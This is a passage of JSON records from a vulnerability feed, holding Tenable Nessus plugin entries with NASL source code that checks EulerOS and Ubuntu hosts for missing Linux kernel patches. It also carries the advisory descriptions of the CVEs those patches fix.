information from kernel stack memory via a crafted application.(CVE-2016-9756i1/4%0\n\n - A flaw was found in the Linux kernel where the swiotlb_print_info() function in lib/swiotlb.c allows local users to obtain some kernel address information by reading the kernel log (dmesg). This address is not useful to commit a further attack.(CVE-2018-5953i1/4%0\n\n - A flaw was found in the way the Linux kernel's file system implementation handled rename operations in which the source was inside and the destination was outside of a bind mount. A privileged user inside a container could use this flaw to escape the bind mount and, potentially, escalate their privileges on the system.(CVE-2015-2925i1/4%0\n\n - A use-after-free fault in the Linux kernel's usbtv driver could allow an attacker to cause a denial of service (system crash), or have unspecified other impacts, by triggering failure of audio registration of USB hardware using the usbtv kernel module.(CVE-2017-17975i1/4%0\n\n - The mm subsystem in the Linux kernel through 4.10.10 does not properly enforce the CONFIG_STRICT_DEVMEM protection mechanism, which allows local users to read or write to kernel memory locations in the first megabyte (and bypass slab-allocation access restrictions) via an application that opens the /dev/mem file, related to arch/x86/mm/init.c and drivers/char/mem.c.(CVE-2017-7889i1/4%0\n\n - A flaw was discovered in the way the kernel allows stackable filesystems to overlay. A local attacker who is able to mount filesystems can abuse this flaw to escalate privileges.(CVE-2014-9922i1/4%0\n\n - sound/core/timer.c in the Linux kernel before 4.4.1 retains certain linked lists after a close or stop action, which allows local users to cause a denial of service (system crash) via a crafted ioctl call, related to the (1) snd_timer_close and (2)\n _snd_timer_stop functions.(CVE-2016-2548i1/4%0\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-14T00:00:00", "type": "nessus", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1524)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7026", "CVE-2014-4699", "CVE-2014-6416", "CVE-2014-7970", "CVE-2014-9584", "CVE-2014-9892", "CVE-2014-9922", "CVE-2015-0275", "CVE-2015-2925", "CVE-2016-2548", "CVE-2016-2782", "CVE-2016-9756", "CVE-2017-11472", "CVE-2017-17975", "CVE-2017-6346", "CVE-2017-7889", "CVE-2018-14617", "CVE-2018-18559", "CVE-2018-5953", "CVE-2018-5995"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1524.NASL", "href": "https://www.tenable.com/plugins/nessus/124977", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124977);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-7026\",\n \"CVE-2014-4699\",\n \"CVE-2014-6416\",\n \"CVE-2014-7970\",\n \"CVE-2014-9584\",\n \"CVE-2014-9892\",\n \"CVE-2014-9922\",\n \"CVE-2015-0275\",\n \"CVE-2015-2925\",\n \"CVE-2016-2548\",\n \"CVE-2016-2782\",\n \"CVE-2016-9756\",\n \"CVE-2017-11472\",\n \"CVE-2017-17975\",\n \"CVE-2017-6346\",\n \"CVE-2017-7889\",\n \"CVE-2018-14617\",\n \"CVE-2018-18559\",\n \"CVE-2018-5953\",\n \"CVE-2018-5995\"\n );\n script_bugtraq_id(\n 64312,\n 68411,\n 69805,\n 70319,\n 71883,\n 73926,\n 75139\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1524)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - In the Linux kernel through 4.19, a use-after-free can\n occur due to a race condition between fanout_add from\n setsockopt and bind on an AF_PACKET socket. This issue\n exists because of the\n 15fe076edea787807a7cdc168df832544b58eba6 incomplete fix\n for a race condition. The code mishandles a certain\n multithreaded case involving a packet_do_bind\n unregister action followed by a packet_notifier\n register action. Later, packet_release operates on only\n one of the two applicable linked lists. The attacker\n can achieve Program Counter control.(CVE-2018-18559i1/4%0\n\n - The acpi_ns_terminate() function in\n drivers/acpi/acpica/nsutils.c in the Linux kernel\n before 4.12 does not flush the operand cache and causes\n a kernel stack dump. A local users could obtain\n sensitive information from kernel memory and bypass the\n KASLR protection mechanism (in the kernel through 4.9)\n via a crafted ACPI table.(CVE-2017-11472i1/4%0\n\n - Race condition in net/packet/af_packet.c in the Linux\n kernel allows local users to cause a denial of service\n (use-after-free) or possibly have unspecified other\n impact via a multithreaded application that makes\n PACKET_FANOUT setsockopt system calls.(CVE-2017-6346i1/4%0\n\n - Multiple race conditions in ipc/shm.c in the Linux\n kernel before 3.12.2 allow local users to cause a\n denial of service (use-after-free and system crash) or\n possibly have unspecified other impact via a crafted\n application that uses shmctl IPC_RMID operations in\n conjunction with other shm system\n calls.(CVE-2013-7026i1/4%0\n\n - An issue was discovered in the Linux kernel. A NULL\n pointer dereference and panic in hfsplus_lookup() in\n the fs/hfsplus/dir.c function can occur when opening a\n file (that is purportedly a hard link) in an hfs+\n filesystem that has malformed catalog data, and is\n mounted read-only without a metadata\n directory.(CVE-2018-14617i1/4%0\n\n - The treo_attach function in drivers/usb/serial/visor.c\n in the Linux kernel before 4.5 allows physically\n proximate attackers to cause a denial of service (NULL\n pointer dereference and system crash) or possibly have\n unspecified other impact by inserting a USB device that\n lacks a (1) bulk-in or (2) interrupt-in\n endpoint.(CVE-2016-2782i1/4%0\n\n - An information-exposure flaw was found in the Linux\n kernel where the pcpu_embed_first_chunk() function in\n mm/percpu.c allows local users to obtain kernel-object\n address information by reading the kernel log (dmesg).\n However, this address is not static and cannot be used\n to commit a further attack.(CVE-2018-5995i1/4%0\n\n - Buffer overflow in net/ceph/auth_x.c in Ceph, as used\n in the Linux kernel before 3.16.3, allows remote\n attackers to cause a denial of service (memory\n corruption and panic) or possibly have unspecified\n other impact via a long unencrypted auth\n ticket.(CVE-2014-6416i1/4%0\n\n - It was found that the Linux kernel's ptrace subsystem\n allowed a traced process' instruction pointer to be set\n to a non-canonical memory address without forcing the\n non-sysret code path when returning to user space. A\n local, unprivileged user could use this flaw to crash\n the system or, potentially, escalate their privileges\n on the system.Note: The CVE-2014-4699 issue only\n affected systems using an Intel CPU.(CVE-2014-4699i1/4%0\n\n - The snd_compr_tstamp function in\n sound/core/compress_offload.c in the Linux kernel\n through 4.7, as used in Android before 2016-08-05 on\n Nexus 5 and 7 (2013) devices, does not properly\n initialize a timestamp data structure, which allows\n attackers to obtain sensitive information via a crafted\n application, aka Android internal bug 28770164 and\n Qualcomm internal bug CR568717.(CVE-2014-9892i1/4%0\n\n - A flaw was found in the way the Linux kernel's ext4\n file system handled the 'page size i1/4z block size'\n condition when the fallocate zero range functionality\n was used. A local attacker could use this flaw to crash\n the system.(CVE-2015-0275i1/4%0\n\n - An information leak flaw was found in the way the Linux\n kernel's ISO9660 file system implementation accessed\n data on an ISO9660 image with RockRidge Extension\n Reference (ER) records. An attacker with physical\n access to the system could use this flaw to disclose up\n to 255 bytes of kernel memory.(CVE-2014-9584i1/4%0\n\n - The pivot_root implementation in fs/namespace.c in the\n Linux kernel through 3.17 does not properly interact\n with certain locations of a chroot directory, which\n allows local users to cause a denial of service\n (mount-tree loop) via . (dot) values in both arguments\n to the pivot_root system call.(CVE-2014-7970i1/4%0\n\n - arch/x86/kvm/emulate.c in the Linux kernel before\n 4.8.12 does not properly initialize Code Segment (CS)\n in certain error cases, which allows local users to\n obtain sensitive information from kernel stack memory\n via a crafted application.(CVE-2016-9756i1/4%0\n\n - A flaw was found in the Linux kernel where the\n swiotlb_print_info() function in lib/swiotlb.c allows\n local users to obtain some kernel address information\n by reading the kernel log (dmesg). This address is not\n useful to commit a further attack.(CVE-2018-5953i1/4%0\n\n - A flaw was found in the way the Linux kernel's file\n system implementation handled rename operations in\n which the source was inside and the destination was\n outside of a bind mount. A privileged user inside a\n container could use this flaw to escape the bind mount\n and, potentially, escalate their privileges on the\n system.(CVE-2015-2925i1/4%0\n\n - A use-after-free fault in the Linux kernel's usbtv\n driver could allow an attacker to cause a denial of\n service (system crash), or have unspecified other\n impacts, by triggering failure of audio registration of\n USB hardware using the usbtv kernel\n module.(CVE-2017-17975i1/4%0\n\n - The mm subsystem in the Linux kernel through 4.10.10\n does not properly enforce the CONFIG_STRICT_DEVMEM\n protection mechanism, which allows local users to read\n or write to kernel memory locations in the first\n megabyte (and bypass slab-allocation access\n restrictions) via an application that opens the\n /dev/mem file, related to arch/x86/mm/init.c and\n drivers/char/mem.c.(CVE-2017-7889i1/4%0\n\n - A flaw was discovered in the way the kernel allows\n stackable filesystems to overlay. A local attacker who\n is able to mount filesystems can abuse this flaw to\n escalate privileges.(CVE-2014-9922i1/4%0\n\n - sound/core/timer.c in the Linux kernel before 4.4.1\n retains certain linked lists after a close or stop\n action, which allows local users to cause a denial of\n service (system crash) via a crafted ioctl call,\n related to the (1) snd_timer_close and (2)\n _snd_timer_stop functions.(CVE-2016-2548i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1524\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a641036f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-24T15:03:30", "description": "It was discovered that the Linux kernel did not properly enforce rlimits for file descriptors sent over UNIX domain sockets. A local attacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the Aiptek Tablet USB device driver in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7515)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed when handling heartbeat- timeout events in the SCTP implementation of the Linux kernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the Linux kernel's CXGB3 driver. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nIt was discovered that the Linux kernel did not keep accurate track of pipe buffer details when error conditions occurred, due to an incomplete fix for CVE-2015-1805. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-0774)\n\nZach Riggle discovered that the Linux kernel's list poison feature did not take into account the mmap_min_addr value. A local attacker could use this to bypass the kernel's poison-pointer protection mechanism while attempting to exploit an existing kernel vulnerability.\n(CVE-2016-0821)\n\nAndy Lutomirski discovered a race condition in the Linux kernel's translation lookaside buffer (TLB) handling of flush events. A local attacker could use this to cause a denial of service or possibly leak sensitive information. (CVE-2016-2069)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework did not verify that a FIFO was attached to a client before attempting to clear it. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced Linux Sound Architecture (ALSA) framework between timer setup and closing of the client, resulting in a use-after-free. A local attacker could use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling implementation of the Advanced Linux Sound Architecture (ALSA) framework, resulting in a use-after-free. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers did not properly manage its data structures. A local attacker could use this to cause a denial of service (system hang or crash) or possibly execute arbitrary code. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers could lead to a deadlock condition. A local attacker could use this to cause a denial of service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce limits on the amount of data allocated to buffer pipes. A local attacker could use this to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-05-12T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-2967-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-1805", "CVE-2015-7515", "CVE-2015-7566", "CVE-2015-7833", "CVE-2015-8767", "CVE-2015-8812", "CVE-2016-0723", "CVE-2016-0774", "CVE-2016-0821", "CVE-2016-2069", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-2847"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2967-1.NASL", "href": "https://www.tenable.com/plugins/nessus/91087", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2967-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91087);\n script_version(\"2.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-1805\", \"CVE-2015-7515\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8767\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2016-0774\", \"CVE-2016-0821\", \"CVE-2016-2069\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n script_xref(name:\"USN\", value:\"2967-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-2967-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that the Linux kernel did not properly enforce\nrlimits for file descriptors sent over UNIX domain sockets. A local\nattacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the Aiptek Tablet USB device driver in\nthe Linux kernel did not properly sanity check the endpoints reported\nby the device. An attacker with physical access could cause a denial\nof service (system crash). (CVE-2015-7515)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed when handling\nheartbeat- timeout events in the SCTP implementation of the Linux\nkernel. A remote attacker could use this to cause a denial of service.\n(CVE-2015-8767)\n\nVenkatesh Pottem discovered a use-after-free vulnerability in the\nLinux kernel's CXGB3 driver. A local attacker could use this to cause\na denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2015-8812)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nIt was discovered that the Linux kernel did not keep accurate track of\npipe buffer details when error conditions occurred, due to an\nincomplete fix for CVE-2015-1805. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode with administrative privileges. (CVE-2016-0774)\n\nZach Riggle discovered that the Linux kernel's list poison feature did\nnot take into account the mmap_min_addr value. A local attacker could\nuse this to bypass the kernel's poison-pointer protection mechanism\nwhile attempting to exploit an existing kernel vulnerability.\n(CVE-2016-0821)\n\nAndy Lutomirski discovered a race condition in the Linux kernel's\ntranslation lookaside buffer (TLB) handling of flush events. A local\nattacker could use this to cause a denial of service or possibly leak\nsensitive information. (CVE-2016-2069)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework did not verify that a FIFO was attached to a client\nbefore attempting to clear it. A local attacker could use this to\ncause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced\nLinux Sound Architecture (ALSA) framework between timer setup and\nclosing of the client, resulting in a use-after-free. A local attacker\ncould use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling\nimplementation of the Advanced Linux Sound Architecture (ALSA)\nframework, resulting in a use-after-free. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound\nArchitecture (ALSA) framework's timer ioctls leading to a\nuse-after-free. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers did not properly\nmanage its data structures. A local attacker could use this to cause a\ndenial of service (system hang or crash) or possibly execute arbitrary\ncode. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers could lead to a\ndeadlock condition. A local attacker could use this to cause a denial\nof service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782)\n\nIt was discovered that the Linux kernel did not enforce limits on the\namount of data allocated to buffer pipes. A local attacker could use\nthis to cause a denial of service (resource exhaustion).\n(CVE-2016-2847).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2967-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/08/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-4312\", \"CVE-2015-1805\", \"CVE-2015-7515\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2015-8767\", \"CVE-2015-8812\", \"CVE-2016-0723\", \"CVE-2016-0774\", \"CVE-2016-0821\", \"CVE-2016-2069\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-2847\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2967-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-102-generic\", pkgver:\"3.2.0-102.142\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-102-generic-pae\", pkgver:\"3.2.0-102.142\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-102-highbank\", pkgver:\"3.2.0-102.142\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-102-virtual\", pkgver:\"3.2.0-102.142\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-27T14:37:49", "description": "The remote Oracle Linux 6 / 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2017-3566 advisory.\n\n - The load_segment_descriptor implementation in arch/x86/kvm/emulate.c in the Linux kernel before 4.9.5 improperly emulates a MOV SS, NULL selector instruction, which allows guest OS users to cause a denial of service (guest OS crash) or gain guest OS privileges via a crafted application. 